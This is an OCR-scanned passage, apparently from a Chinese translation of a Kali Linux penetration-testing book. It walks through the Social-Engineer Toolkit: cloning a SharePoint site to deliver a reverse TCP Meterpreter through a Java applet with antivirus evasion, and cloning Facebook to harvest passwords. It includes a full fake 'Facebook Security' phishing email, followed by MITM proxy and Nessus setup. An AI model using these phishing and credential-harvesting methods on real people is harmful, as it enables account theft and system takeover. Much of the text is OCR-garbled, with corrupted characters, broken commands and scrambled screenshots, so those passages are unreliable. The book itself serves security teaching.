f3F440 -ZEXeGoPL ruqIdBg 

SEND L3 ERROR: 1803 byte packet (0800:06) destined to 17.172.116.36 was not forwarded (libnet write raw 
_ipv4(): -1 bytes written (Message too long) 


1 


) 
j 


User requested a CTRL+C... 


:~# 国 


(deprecated, next time use proper shutdown) 
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小 结 
本 草 介 绍 了 使 用 Kali 中 自 带 的 工具 对 Web 服 务 磊 漏洞 加 以 利用 的 各 种 方法 。 最 常见 的 方法 是 
用 自动 化 工具 找 出 已 知 漏 洞 ， 然 后 利用 最 可 能 的 路 径 来 获得 日 标 系 统 的 访问 。 


一 开始 , 我 们 着 重 介 绍 了 用 来 找 出 色 洞 的 各 种 工具 。 之 后 介绍 了 对 第 见 服务 融 以 及 邮件 服务 
船上 的 漏洞 加 以 利用 的 工具 。 然后 春 重 介绍 了 如 何 用 又 力 破解 工具 从 没有 已 知 可 利用 漏洞 的 服务 
船上 获取 数据 。 最 后 介绍 了 密码 人 破解 和 中 间 人 攻击 ， 这 些 内 容 还 会 在 后 续 章 书 进 一 步 控 讨 。 


下 一 章 会 着 重 介绍 找 出 和 利用 主机 系统 ， 即 客户 端 设 备 上 的 漏洞 。 


l^ 


= Pim Dod 


Zym (client) 或 主机 (host ) Z&$8 HOR EMA mB, EAEN OP a HE A CZ Ee 
SE. Fe aig BER JA ee a IRS ROA, BOE MBAR C HEB ST d ) 
SRA TH, AR Pie ti HE AE Aon fs Am, APS HE S| ARH AT 
BÉ YT val o 


AIE, AP oir SC ET HS IE zs MAE. HER Web iz HBAS SE, PLAY A De ER h 
谁 连接 到 了 了 Web 应用， 系统 上 有 哪些 漏洞 ， 以 及 这 些 系统 是 否 可 以 成 为 从 Web 应 用 获取 访问 权限 
或 信息 的 一 种 途径 。 本 音 将 集中 介绍 如 何 找 出 访问 Web 应 用 的 系统 ， 评 佑 这些 系统 中 的 漏洞 ， 并 
对 这 些 源 洞 加 以 利用 。 为 外 ,本 莉 还 将 着 重 介 绍 破解 密码 的 方法 ， 因 为 这 是 最 第 用 的 保护 主机 系 
统 安 全 的 方式 。 

本 半 站 完 会 完 介 绍 如何 通 过 社会 工程 来 攻击 主机 。 然 后 详细 阐述 如 何在 主机 系统 上 找到 汤 
lll, 这样 你 就 可 以 使 用 本 书 中 其 他 章 介绍 的 工具 对 这 些 汤 洞 加 以 利用 。 最 后 ,我 们 将 介绍 如 何 攻 
击 密码 ， 因 为 密码 是 最 常见 的 保障 安全 的 形式 。 


4.1 社会 工程 


人 类 总 是 目标 系统 安全 态势 中 最 薄弱 的 环 记 。 你 越 是 想 对 终端 用 户 有 更 多 的 约束 , 他 们 就 越 
是 会 试 春 纸 过 这 些 安全 政策 。 而 你 设立 的 约束 越 少 ， 人 们 就 越 不 会 于 照 你 的 安全 政策 。 这 如 意味 
F, 在 决定 如 何 你 护 终端 用 户 免 受 网 络 威胁 时 , 我 们 面临 的 是 一 把 双 刃 剑 。 而 墨客 们 闪 知 这 一 点 ， 
因此 他 们 通过 各 种 方式 腊 准 终 闯 用户， 试图 利用 这 些 用 户 的 一 个 关键 特征 一 一 信任 。 

TE TEES AV RN 许多 客户 病 攻 击 虱 是 据 此 来 欺骗 终端 用 户 , 使 他 
们 的 系统 骏 露 给 攻击 。 社 会 工程 涉及 的 范围 很 广 ， 从 拨打 电话 声称 利己 是 菏 公 司 正 式 员 工 到 在 人 
人 网 上 发 个 声称 是 某 类 服务 的 链接 而 实际 上 是 欺 驴 客户 的 一 种 手段 部 是 。 

如 琳 想 确保 发 起 的 社会 工程 攻击 能 够 成 功 , 那么 最 佳 的 方式 苹 花 时 间 充 分 熟悉 你 的 目标 , 也 
就 是 要 等 习 用 户 是 如 何 交 流 的 , 并 答 试 融入 他 们 的 环境 。 许 多 未 能 成 功 的 社会 工程 攻击 都 是 因为 
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采用 通用 的 格式 ,而 内 容 中 没有 能 够 吸引 被 攻击 用 户 的 强 有 力 的 抓 手 ， 比 如 一 些 写 得 很 糟糕 的 电 
邮 总 是 声称 用 户 获得 了 无 人 认领 的 奖金 。 使 用 如 人 人 网 这 样 的 社交 媒体 资源 是 了 解 日 标 用 户 的 一 
个 好 方式 ， 比 如 他 有 哪些 爱好 ， 第 用 哪 种 表述 方式 。 举 个 例子 ， 如 有 东 茶 个 目标 用 户 的 人 人 网 个 人 
档案 上 显示 了 茶 些 球 队 的 队 微 ， 那 么 利用 打折 的 球赛 门票 设 定 圈套 效 打 会 更 好 。 


由 于 大 多 数 客 户 端 攻击 都 是 利用 社会 工程 ,下 一 市 我 们 将 会 介绍 Kali 中 市 的 一 个 流行 的 社会 
LAE TAF 


42 ”社会 工程 工具 集 (SET) 


社会 工程 工具 集 (SET, Social Engineer Toolkit ) 是 由 TrustedSec 的 创始 人 创建 并 开发 的 。 它 
是 一 个 基于 Python 的 开源 工具 ， 主 要 功能 是 利用 社会 工程 进行 渗透 测试 。SET 深 受 专 业 安 全 人 员 
的 欢迎 ， 用 于 测试 某 个 企业 的 安全 态势 。 真 实 攻击 者 也 会 利用 SET 进行 主动 或 恶意 攻击 。 它 是 最 
第 见 的 用 来 进行 社会 工程 攻击 的 工具 。 


X 


如 果 想 启动 SET, 请 点 击 浏览 Exploitation Tools > Social Engineering Tools, 然后 选择 se-toolkit。 


在 Kali 上 首次 启动 SET 时 ，SET 分 发 会 直接 从 GitHub 上 更 新 。 它 会 弹出 个 选项 说 自动 接收 更 
新 。 如 琳 同 意 晶 动 更 新 ， 选 择 yes。 


A v X Terminal 


File Edit View Terminal Help 


SET 会 要 求 你 确认 是 否 已 安装 git。Kalj 已 经 预 载 了 git， 不 过 最 好 的 方式 还 是 沿用 第 1 章 中 介 
绍 的 的 步骤 更 新 Kali。 这 一 更 新 将 包括 获取 能 确保 SET 正常 工作 的 git 版 本 。 
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Kali 1.0 不 包含 .git 目 录 ， 所 以 如 果 想 要 更 新 ， 你 需要 参照 以 下 步 又 : 


(D 打开 终 病 ， 切 换 目 录 到 cq /usr/share. 
(2) 输入 mv set backup.set, KO WJsetE x. 
(3) 依照 下 面 的 命令 ， 重 新 从 GitHub 上 下 载 SET: 


git clone https://github.com/trustedsec/social- engineer-toolkit/set/ 


:-/usr/share# cd /share 
:/usr/share# mv set backup.set 
:-/usr/share# git clone https://github.com/trustedsec/social -engineer-toolkit 


/ set/ 
Cloning into 'set' 
remote: Counting objects: 8970, (done, 
remote: Compressing objects: 100% (3100/3100), done. 
remote: Total 8970 (delta 5956), reused 88/70 (delta 5857) 
Receiving objects: 100% (8970/8970), 46.19 MiB | 2.58 MiB/s, done. 
Resolving deltas: 100% (5956/5956), done. 
:/usr/share# 


(4) 找 回 老 的 config 文 件 ， 避 免 重 新 设置 MSF 的 路 径 ， 使 用 如 下 命令 
cp backup.set/config/ set config set/config/set config 


(5) 使 用 se-toolkit 命 令 验证 SET 能 否 正 浓 工 作 。 


:/usr/share# cp backup.set/config/set config set/config/set config 
:/usr/share# se-toolkit 


IMPORTANT NOTICE! The Social-Engineer Toolkit has made some significant 
changes due to the folder structure of Kali and FSH (Linux). 


ALL SET dynamic information will now be saved in the ~/.set directory not 
in src/program junk. 


[!] Please note that you should use se-toolkit from now on. 

[!] Launching set by typing 'set' is going away soon. 

[!] If on Kali Linux, just type ‘se-toolkit' anywhere... 

[!] If not on Kali, run python setup.py install and you can use se-toolkit anywhere.. 


Press {return} to continue into SET. 


使 用 SET 来 进行 克隆 和 攻击 


现在 你 已 经 知 直 了 SET 的 基本 工作 原理 , 让 我 们 用 一 个 可 能 会 被 信任 的 网 站 来 攻击 一 下 客户 
于 机 带 。 尽 管 我 们 可 以 用 任意 网 站 来 举例 于 ， 但 还 是 使 用 一 个 简单 点 儿 的 更 好 。 


这 里 我 们 举 一 个 通过 克隆 企业 的 SharePoint 站 点 来 借助 meterpreter 对 受害 者 进行 利用 的 
例子 。 实 际 上 ， 它 可 以 是 你 想 攻 击 的 任何 网 站 。 我 们 选择 SharePoint 站 点 是 因为 作为 渗透 测试 
AB, , HRA Be AH AAA BE VEGA BI H POE Hbro VERI BS ESL) GE E RI BE AE 
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下 一 步 是 浏览 Exploitation Tools > Social Engineering Toolkit > se-toolkit 来 启动 SET。 


接受 所 有 授权 证 书 和 服务 条 款 之 后 ， 你 就 能 看 到 SET 的 主屏 幕 。 


The Social-Engineer Toolkit is a product of TrustedSec. 


Visit: https: //wew.trustedsec. com 
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我 们 建议 选取 选项 $ Update the Social-Engineer Toolkit。 更 新 后 ， 选 择 选 项 DJ Social- 
Engineering Attacks。 下 一 个 截图 会 显示 SET 中 社会 工程 攻击 下 可 用 的 不 同 的 网 站 攻击 向 量 。 
Spear-Phishing ( 鱼 义 式 网 络 钓鱼 ) 选项 是 一 种 稼 见 的 攻击 ， 它 能 将 攻击 般 入 到 电邮 和 PDF 中 。 鱼 
又 式 网 络 钓鱼 会 下 接 在 SET 中 将 攻击 文件 伪装 成 由 受害 人 发 出 的 电邮 发 送 。 


The social-Engineer Toolkit is a product of Trustedsec. 


Visit: https://www. trustedsec. com 


在 本 例 中 , 我 们 选择 了 Website Attack Vectors。 前 面 我 们 已 经 克隆 了 一 个 网 站 用 于 针对 网 站 
的 攻击 。 接 下 来 ,我 们 需要 决定 如 何 发 出 攻击 载 何 ,这 里 有 几 种 可 用 选项 ,选择 Java Applet Attack, 
通常 也 就 是 第 1 个 选项 。 
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Java Applet Attack 


Metasploit Browser Exploit 


Credential Harvester 


TabNabbing 


Man Left in the Middle Attack 


web-Jacking Attack 


Multi-Attack 


SET 会 询问 你 是 想 使 用 SET 目 斋 的 现 有 模板 ， 还 是 想 目 己 克 隆 一 个 网 站 。 黑 认 的 模板 并 不 好 
用 ， 我 们 建议 你 克隆 一 个 网 站 ， 如 前 面 提 到 的 SharePoint 的 那个 例子 。 


在 下 一 屏 内 容 中 ，SET 会 显示 若干 个 有 关 用 户 如 何 复制 该 网 站 的 选项 。 在 本 例 中 ， 我 们 会 选 
取 site-cloner 选 项 。 选 择 site-cloner 后 ，SET 会 提出 一 系列 问题 。 这 些 问题 可 以 引导 你 克隆 一 个 网 
站 ， 然 后 让 它 在 Kali 中 运行 。 站 点 克隆 器 会 询问 如 下 设置 : 


O NAT/Port forwarding (NAT/ 端 口 转发 ) ”这 个 选项 可 能 会 有 点 令 人 困惑 。SET 是 在 询问 
受害 者 是 会 通过 访问 你 在 Kali 服 务 硕 上 配置 的 卫 地 址 来 连接 到 你 的 机 需 , 还 是 会 通过 其 他 
IP 地 址 ( 比如 NAT 地 址 ) 连 接 到 你 的 机 右 。 当 你 在 攻击 你 的 网 络 外 或 因特网 上 的 受害 者 时 ， 
它 会 非常 好 用 。 如 果 你 是 在 攻击 你 的 网 络 外 的 受害 者 , 你 可 以 选择 yes。 如 果 你 是 在 攻击 
同一 个 网 络 中 的 受害 者 ( 比如 内 部 实验 室 )， 选 择 no。 
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口 IP address/hostname for reverse connection 〈 反 回 连接 的 IP 地 址 /主机 名 ) ” 当 SET 将 它 的 
载 何 发 送 给 受害 者 时，SET 需 要 告诉 受害 者 如 何 连 回 Kali。 在 实验 室 环境 中 ， 你 可 以 输入 
你 的 Kali 服 务 胡 的 人 P 地 址 。 

O URL you want to clone〈 你 希望 克隆 的 URL) ”这 是 你 要 复制 的 网 站 的 链接 。 

口 Exploit to deliver 〈 要 发 送 的 漏洞 利用 ) ”SET 会 使 用 Metasploit 框 织 来 发 送 漏洞 利用 。 
最 流行 的 选项 时 Windows Reverse TCP Meterpreter, Windows Reverse TCP Meterpreter 
的 工作 原理 是 让 受害 者 运行 一 个 可 执行 文件 ， 从 而 建立 一 个 开放 端口 ， 以 便 供 攻击 者 连 
回 并 获取 受害 考 机 融 的 全 部 shell 访 问 权 限 。 下 面 的 规 图 显示 了 可 用 的 载 傈 。Windows 
Reverse_TCP Meterpreter 是 列表 中 的 第 二 个 选项 。 


你 可 以 导入 自己 的 可 执行 文件 。 有 自己 的 工具 /恶意 软件 的 攻击 者 或 其 他 人 
群 喜欢 用 这 种 方式 。 


SET 会 询问 你 希望 使 用 哪 种 类 型 的 反 病 毒 混 消 技术 。 与 此 同时 ， 它 会 在 各 个 选项 劳 边 显 示 一 


个 评分 。 我 们 建议 通 第 情况 下， 最 好 选择 评分 较 蜗 的 选项 ,除非 你 有 特定 的 需要 。 下 面 的 截图 显 
示 了 可 用 的 选项 。 我 们 选择 选项 16， 因 为 它 的 得 分 排名 最 高 。 
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SET 会 询问 你 要 用 哪个 监听 端口 。 大 多 数 情况 下 ， 请 坚持 选用 默认 端口 。 在 回答 了 最 后 一 个 
问题 之 后 ，SET 会 司 动 殉 隆 的 网 站 。 


新 克隆 的 网 站 可 以 用 来 攻击 目标 用 户 。 首 先 , 你 要 诱导 用 户 使 用 互联 网 浏览 硕 来 访问 我 们 殉 
条 的 网 站 。 然 后 ， 访 问 了 元 隆 的 仿冒 网 站 的 用 户 会 接收 到 一 个 Java 弹 出 框 。 如 果 运 行 了 的 话 ,， 它 
能 提供 一 个 连 到 你 的 Kali 服 务 需 的 Reverse TCP Meterpreter。 作 为 攻击 者 ， 你 可 以 启动 一 个 
meterpreter 会 话 ， 并 在 访问 克隆 网 站 的 设备 上 获得 全 部 的 管理 员 权限 。 


如 下 图 所 示 ， 用 户 的 客户 桨 机 沉 上 会 出 现 一 个 简单 的 Java 弹 出 消息 ， 这 看 上 去 很 正常 ， 而 且 
普通 用 户 一 般 会 不 假 思索 的 选择 运行 。 


Warning - Security 


The application's digital signature cannot be verified. 
Do you want to run the application? 


Name: Trusted Java Applet (VERIFIED SAFE) 
Publisher: UNKNOWN 


http://10.255.27.200 


[x3 3] This application will run with unrestricted access which may put 
! your personal information at risk. Run this application only if you 
trust the publisher. 


在 终端 用 户 运 行 克 隆 网 站 的 Java applet Hh], Kalikas ee eal S lee, UH PI 
的 稚 图 所 示 : 


在 下 一 个 示例 截图 中 可 以 看 到 ，SET 可 以 和 meterpreter 会 话 交 互 ， 并 直接 调用 命令 在 受害 者 
的 机 震 上 执行 : 
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你 可 以 跟 meterpreter 保 持 多 个 会 话 。 在 本 例 中 ， 我 们 用 的 是 命令 sessions -I 1。 最 重要 的 
是 ,我们 是 在 跟 meterpreter 的 第 一 个 会 话 进行 交互 。 如 果 我 们 攻陷 了 多 人 台 主 机 ， 我 们 可 以 有 多 个 
meterpreter 会 话 、 跟 他 们 交互 、 在 他 们 之 间 切 换 ， 或 是 将 他 们 逐个 关 挥 。 

现在 我 们 已 经 了 解 了 使 用 SET 的 一 些 基 础 知识 ， 让 我 们 再 看 一 个 例子 。 我 们 将 要 学 习 如 何 克 
隆 一 个 网 站 来 入 取 密码 。 


这 次 在 到 达 攻 击 选项 界面 时 ， 我 们 选择 凭据 收集 融 攻 击 〈Credential Harvester Attack ) Edi 
收集 需 攻 击 可 以 通过 浏览 Social Engineering Attacks > Website Attack Vectors > Credential 
Harvester Attacks 来 打开 。 


The Web-Jacking Attack method was introduc 


a? bs TAF PERI NT a 
] ed IRE LIMA ] juu. 1 


The Multi-Attack method wil! 
menu. For example 


i rou car | 本 TT Hj 


f n] ELTE EB Rd. EH ARE EEA A BUWebsfF (HTML、 图 片 及 其 他 文件 )。 


流行 站 点 如 Facebook、Gmail 和 Twitter 都 有 模板 可 供 利 用 。 其 他 网 站 则 可 以 通过 输入 相应 的 
URL 来 克隆 。 但 有 些 情 况 下 ,我 们 会 发 现 网 站 模板 和 克隆 站 点 都 有 一 些小 问题 。 这 时 候 ， 你 需要 
使 用 定制 导入 。 首 先 ， 用 Web 复 制 工具 或 是 Web 克 隆 软 件 在 Kali 中 保存 一 份 某 个 网 站 的 找 贝 。 然 
后 ， 使 用 定制 导入 选项 指定 该 站 点 拷贝 所 在 的 目录 。 你 需要 试 试 看 哪些 选项 最 适合 你 的 网 站 。 


The first method will allow SET to import a List of pre-defined web 
applications that it can utilize within the attack. 


The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 


The third method allows you to import your own website, note that you 


should only have an index.html when using the import website 
functionality. 


l ] Web Templat es 
2) Site Cloner 
3) Custom Import 


99) Return to Webattack Menu 
TE E 


我 们 选择 了 选项 2) Site Cloner。 之 后 它 会 让 我 们 输入 一 个 URL。 我 们 要 元 隆 https://www. 


facebook.com» 


我 们 输入 的 都 是 很 确切 的 URL， 并 且 要 指定 使 用 的 是 HTTPS 还 是 HTTP 
CN URL。 大 多 数 情 况 下 ， 二 者 并 没什么 区 别 ， 因为 我 们 不 会 托管 一 个 安全 的 网 站 。 
但 某 些 情况 下 ，HTTP 站 点 跟 HTTPS 站 点 会 有 所 不 同 。 


我 们 还 会 被 要 求 输入 SET 用 来 托管 假冒 网 站 的 IP 地 址 。 通 常 这 个 地 址 也 就 是 你 的 Kali Linux 
环境 的 IP 地 址 。 不 过 ， 如 果 你 计划 将 受害 者 引导 到 一 个 使 用 NAT 转 换 的 地 址 上 ( 可 能 通过 上 游 的 
防火 墙 )， 那 么 输入 NAT 地 址 。 


在 你 克隆 了 网 站 并 将 监听 端口 配置 好 后 ，SET 会 开始 等 竺 连接， 如 下 面 的 截图 所 示 : 


ES Credential harveste jill allow you to utilize the clone capabilitie 
d to harves ntials or parameters from a website as well as place 
report 

[-] This option is used for what IP [is server will POST to. 

[-] If you're using an a tamal J wour axternal IP for this 

Tabnabbing:16.6. 1.235ress for | S pack in R Hari aster/T 

[=] SET supports both HTTP and 

[-] Example: http: //wew.thisi 

k.com - iter the url : a ://www/faceboo 


i | å a 8 kam J a p a "1-3 E E 1 oad e ; m 
LOnLnG The webpslti oe : aa 1. bACGRbOSR.CoOony Ladin. 0ND 


r3 
L 
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下 一 步 是 将 用 户 引 导 到 假冒 的 站 点 上 。 第 用 的 办 法 是 发 送 一 封 假冒 的 电子 邮件 , thE Pri 
的 钓鱼 电邮 。SET 可 以 帮 你 目 动 化 实现 ,但 在 这 个 例子 中 ， 我们 打算 手动 操作 。 下 面 这 个 例子 显 
示 了 一 个 链接 到 我 们 克隆 的 Facebook 站 点 的 假冒 电邮 。 当 用 户 点 击 链接 www.facebook.com 时 , 他 
会 被 引导 到 我 们 假冒 的 位 于 facebook.secmob.net 的 网 站 。 


Facebook <wwt.secmob@gmail.com- 
u n rs -A am Lakhan d weal COT 


T»: Aamir Lakhani -c 
Facebook Security 


Dear Facebook user, 


In an effort to make you online experience safer and more enjoyable, Facebook will be 
implementing a new login system that will affect all Facebook users. These changes will 
offer new features and increased account security. 


Before you are able to use the new login system, you will be required to update your 
account. 


Please click on the link below to update your account online now 
w.Tracebook.comM 


https://facebook.secmaob.net/ 


If you have any questions, reference out New User guide. 


Thanks, 


The Facebook Team 


Facebook will never ask you for your password in an email or Facebook message. Learn 
more about how to keep your account secure. 


在 下 面 的 截图 中 你 可 以 看 到 我 们 克隆 的 Facebook 很 帝 真 ,但 URL 并 不 是 真 的 Facebook 的 
URL。 这 个 攻击 假设 受害 者 并 未 注意 到 URE 的 细微 差异 。 这 也 是 为 什么 真实 的 钓鱼 攻击 都 使 用 跟 
真实 站 点 类 似 的 域名 。 


El wasczme to Faretack - Login, 


L gapmch n 


J Oe ftii 
[E] Maw ed - Criling Hiriei fume 4 esl | 


T =f = 
eee Lee) S 
4 i r1 , 
* iil 0 ] 
x CES m a en - 


kd (teks T 


LL] E Ica Hg - D Ejsebeanta | 


Connect with friends and the 
world around you on Facebook. 


tsfree and anas vesti pe. 


See nhatos and updates fram fi 


Share whats new in your life on your Ti 
pirthday 
Meth *| Day =|) Year =[ oL 


Female Wale 


当 受 : 


受害 者 在 假冒 网 站 上 输入 他 的 或 她 的 名 字 时 ，SET 会 将 用 户 重 定 问 跳 转 到 真实 的 站 点 。 大 
多 数 情 况 下 , 用 户 会 在 真实 站 点 再 次 输入 他 们 的 密码 并 登入 网 站 ， 而 不 会 意识 到 他 们 已 经 被 攻击 
了 。 在 运行 SET 的 Kali Linux 上， 你 能 看 到 密码 被 截获 本。 


除了 实时 日 志 ，SET 还 会 生成 一 份 该 事件 的 报告 ,这样 攻击 者 之 后 就 能 使 用 魏 取 的 凭据 了 。 


4.3 MITM 代理 服务 器 115 


Welcome to the Social-Engineer Toolkit Report Generation Tool. This report should contain information obtained during a 
successful phishing attack and provide you with the website and all of the parameters that were harvested. Please remember 
that SET is open-source, free, and available to the information security community. Use this tool for good, not evil. 


TEE HTUISETISUEERJ LEGES P miT, 183550 ELA R — E BOT Pi IT ET Y fes — au 
PPRA RBS JN CA HEUS OS oe A HP EK Web THO o 

EROP, KAMARA ACHR s. (RA, FRA cpm Ir A2R— Dh. (ERE 
像 SET 这 样 的 工具 进行 Web 攻 击 时 ， 如 何 检查 客户 端的 工作 方式 。 


Ls 
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MITM Proxy 是 渗透 测试 人 员 用 来 检查 客户 六 漏洞 的 一 蒜 优 秀 工 具 。 它 允许 定理 员 检 查 
HTTPS 的 连接 ， 暂 停 ， 检 查 和 回复 请 求 ， 甚 至 还 允许 管理 员 替 换 来 自 某 个 Web 服 务 器 的 请 求 或 
MA JW o 


MITM Proxy 有 利于 渗透 测试 人 员 快速 检查 攻击 ， 摸 清 有 哪些 请 求 或 响应 是 来 自 或 发 往 该 
Webi dH]. WAU SIMITM Proxy, X) ii Kali > Sniffing/Spoofing > Web Sniffers, ， 选 择 
mitmproxy | n] 。 


0 


我 们 建议 在 搭建 SET 攻击 和 分 析 攻 击 行为 时 使 用 MITM Proxy， 在 测试 环境 
中 最 好 同时 运行 SET 和 MITM Proxy。 


MITM 代 理 服 务 器 搭建 好 后 , 你 需要 将 客户 端 Web 浏 览 器 指向 你 的 Kali 服 务 器 。MITM 会 显示 
客户 端 一 边 发 生 的 Web 请 求 记 录 ， 如 下 面 的 截图 所 示 : 
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GET https://github.com/ 
全 200 text/html 5.52kB 
https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github2-24f59e3ded11f2a 
1c7ef9ee730882bd8d550cfb8. css 
+ 200 text/css 28.27kB 
https://a248.e.akamai.net/assets.github.com/images/modules/header/ logov7@4x-hover .png?1 
324325424 
— 200 image/png 6.01kB 
https://a248.e.akamai.net/assets.github.com/javascripts/bundles/jguery-bżcaû7cb3c906cec 
cfd58811b430b8bc25245926. 15 
一 200 application/x-javascript 32.59kB 
J GET https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/pithub-cb564c47c5ial4 
afiae/65d7ebab59c4e78b97cb.css 
+ 200 text/css 37.09kB 
GET https: //a248.¢,akamai.net/assets.github.com/images/modules/home/ logos/Tacebook.png?1324 
526958 
— 200 image/png 5.55kB 


AVES P v AE BI PIC 3D V, did ARRE H zs 1 JS ee BUM Web22 358i], MTM 
Proxy 并 不 是 主要 的 组 件 ， 但 是 在 SET 投入 实际 应 用 前 ， 对 SET 进行 设置 和 测试 时 ，MITM Proxy 
是 一 个 绝妙 的 工具 。 在 后 面 的 草 方 中 ,我 们 还 会 检验 其 他 类 型 的 代理 服务 磊 。 不 过 ,渗透 测试 人 
员 偶 爱 MITM 代 理 服 务 天 的 原因 很 简单 ， 因 为 用 它 测试 攻击 工具 很 方便 ， 只 需要 将 工具 直接 连接 
到 Kali Linux 上 即 可 。 
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访问 主机 系统 的 一 个 背 见 方式 是 找 出 并 利用 操作 系统 的 漏洞 ， 以 便 之 后 安装 应 用 或 其 他 程 
序 。 如 Nessus 之 类 的 工具 可 以 上 自动 检测 系统 中 是 否 含有 已 知 的 公开 汤 洞 。 本 市 将 介绍 如 何 安 装 
Nessus， 并 针对 某 个 目标 系统 执行 Nessus。 通 过 Nessus 找 出 漏洞 之 后 ,可 以 使 用 我 们 在 第 3 划 中 介 
绍 过 的 漏洞 利用 工具 ， 对 这 些 漏洞 加 以 利用 。 


使 用 Nessus 进 行 主机 扫描 


Kali 并 没有 预 装 Nessus。 要 使 用 Nessus， 你 需要 先 从 Tenable 公 司 获 得 一 个 注册 人 码 。Tenable 
提供 了 一 个 家 庭 版 订阅 选项 ， 但 它 会 限制 你 最 多 只 能 扫描 16 个 IP 地 址 。 如 果 你 要 扫描 更 多 的 IP， 
那么 必须 从 Tenable 购 买 专业 版 订阅 。 


1. 在 Kali 上 安装 Nessus 


Nessus 家 庭 版 订阅 仅 能 用 于 非 商 业 的 个 人 有 用途。 如 果 你 要 在 商业 环境 中 使 用 Nessus ， 你 必须 
购买 Nessus 专 业 版 订阅 (Nessus Professional Feed )。 要 获得 Nessus 的 激活 码 ， 你 可 以 访问 


http://www.tenable.com/products/nessus/nessus-homefeed. 


由 于 Kali 中 没有 预 装 Nessus， 所 以 你 需要 目 己 去 下 载 并 安装 。 需 要 注意 的 是 ，Nessus 并 没有 
Kali Linux 专 版 ， 但 针对 Debian 6.0 适 配 的 那个 版 本 也 能 在 Kali Linux 上 使 用 。 
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(1) FzNessusHJDebian A £3, 访问 http://wwwi.tenable.conyproducts/nessus/select-your-operatine- 
system， 下 载 Nessus 的 Debian-64 位 版 本 。 


网 Www 你 可 以 将 它 复 制 /tmp 目 录 中 。 如 果 你 是 在 其 他 目录 输入 
这 些 命令 ， 你 可 能 需要 调整 具体 的 命 


(2) 路 到 下 载 Nessus 的 目录 ， 调 用 如 下 命令 最 终 它 会 生成 一 个 etc 目 录 和 一 个 opt 目 录 。 


ar vx Nessus-5.2.1-debian6* 
tar -xzvf data.tar.gz 
tar -xzvf control.tar.gz 


ar vx Nessus-5.2.1-debian6* 


tar -xzvf data.tar.gz 


tar -xzvf control.tar.gz 
(3) 将 /tmp/opt 中 的 nessus 目 录 复 制 到 /opt 目 录 ; 然后 就 当 /opt 目 录 不 存在 。 调 用 如 下 的 命令 


mkdir /opt # 它 可 能 会 显示 一 个 错误 ， 说 /opt 目 录 已 经 存在 ; 那 就 跳 到 下 一 条 命令 


cp -RE /< 安装 目录 >/opt/nessus /opt 


cp -RE /< 安装 目录 >/etc/init.d/nessus* /etc/init.d 


: /Nessusl£ cp -Rf / N8S3 fopt/nessus/ /apt/ 
'/Nessusl# pas MS iy |/etc/init.d/neSeus* /|etc/idinit.d 
'/Nessusl# , finit susd start 


¢Starting Nessus 
:/Nessusl# 


(4) 你 可 以 删除 mp 目录 中 下 载 的 Nessus 的 内 容 。 
(5) 要 启动 Nessus 工 具 ， 调 用 如 下 命令 : 


/etc/init.d/nessusd start 


(6) oe SllNessusH] FLA. FTAA ham, DEP ehttps://127.0.0.1:8834. 


` 
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2. 使 用 Nessus 


第 一 次 登录 Nessus 时 ， 它 会 弹出 一 些 问候 语 ， 然 后 弹出 一 个 SSL 和 警告 ， 资 明 你 正在 连接 一 
个 使 用 上 自 签 名 证 书 的 站 点 。 在 跳 过 一 些 浅显 易 懂 的 页 面 后 ， 它 会 要 求 你 输入 激活 码 ， 并 下 载 最 
新 插件 。 


ness 


Welcome to Nessus^ 5 


Thank you for installing Nessus, the world leader in vulnerability scanners. Nessus will allow you to perform: 


e High-speed vulnerability discovery, to determine which hosts are running which services 

e Agentless auditing, to make sure no host on your network is missing security patches 

e Compliance checks, to verify and prove that every host on your network adheres to the security policy you 
defined 

èe Scan scheduling, to automatically run scans at the frequency you select 

e And more! 


During the next steps, we are going to create an administrative account and register your scanner with a Plugin Feed, 
which we will download. You will need an Activation Code before you can use Nessus; if you do not have an Activation 
Code already, please go to http://www.nessus.org/register/ to get one now. 


Click to switch to "Worksr 


Get started > 


你 还 要 设置 一 个 用 户 名 和 密码 , 用 于 管理 Nessus 应 用 。 下 面 的 截图 显示 的 是 设置 账户 以 及 注 
册 后 Tenable 发 来 激活 码 的 过 程 : 


EA nessus 


Initial Account Setup 


First, we need to create an admin user for the scanner. This user will have administrative control on the scanner; the 
admin has the ability to create/delete users, stop ongoing scans, and change the scanner configuration. 


Login: | | 


Password: | | 


Confirm Password: [| 


< Prev Next > 


Because the admin user can change the scanner configuration, the admin has the ability to execute commands on the 
remote host. Therefore, it should be considered that the admin user has the same privileges as the "root" (or 
administrator) user on the remote host. 
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»gistration 


ew vulnerabilities is discovered and released into the public domain, Tenable's research staff 
gins") that enable Nessus to detect their presence. The plugins contain vulnerability 

hm to test for the presence of the security issue, and a set of remediation actions. To use 
bscribe to a "Plugin Feed" to obtain an Activation Code. 


ctivation Code 


| Activation Code: | 


插件 的 初始 化 下 载 需要 一 些 时 间 ， 请 耐心 等 待 。 


Nessus is fetching the newest plugin set 


Please wait... 


E 
The Nessus server is now downloading the newest plugins fram Tenable which may take some time as we're testing for a lat of stuff. 


Then, the Nessus server will start processing the plugins, which is CPU / disk intensive and, therefore, takes a lot of time -- this is all part of the installation process. 
Once the plugins are downloaded and processed, subsequent startups will be much faster, 


Since this operation is taking some time, here are some useful links: 


* Documentation: This page contains all of thea manuals that you'll need to get the most out of Nessus and its features, 
Discussion Forums: Do you need some help or want to interact with the Nessus community? This would be the place to ga! 

* Nessus Video Tutorials: Our YouTube channel contains a lat of videos that will help new Nessus users get started, and experienced users to discover new 
features. 

* Support Portal: Manage your feed, open support tickets and get sample security policies (audit files). 

+ Tenable Blog: Contains daily posts about new features for all of aur products: Nessus, SecurityCenter, the Log Correlation Engine (LCE), and the Passive 
Vulnerability Scanner (PVS). 
Mandatory Sales Pitch: Do you intend to use Nessus to scan a large network? Take a look at Tenable SecurityCenter to see how you could leverage multiple 
scanners in your environment and share the results with the rest af your team. 


* Tenable Podcast: Tenable regularly holds a podcast where we discuss about major security events of the week. 
* Twitter: Yup, we're there tao. 


Thanks again for Installing Nessus, and far your patience while the plugins are getting downloaded and processed. We hope you'll enjoy Nessus 5's new features! 


Good luck with the audit of your network! 


在 完成 所 有 更 新 的 下 载 和 初始 化 后 , 它 会 显示 登录 界面 。 Ta REO CST BAY) 
户 名 和 蜜 但 登录 。 


Nessus ea 


Sign In To Continue 


Looking for the older Flash interface? 


tenable 


network security 
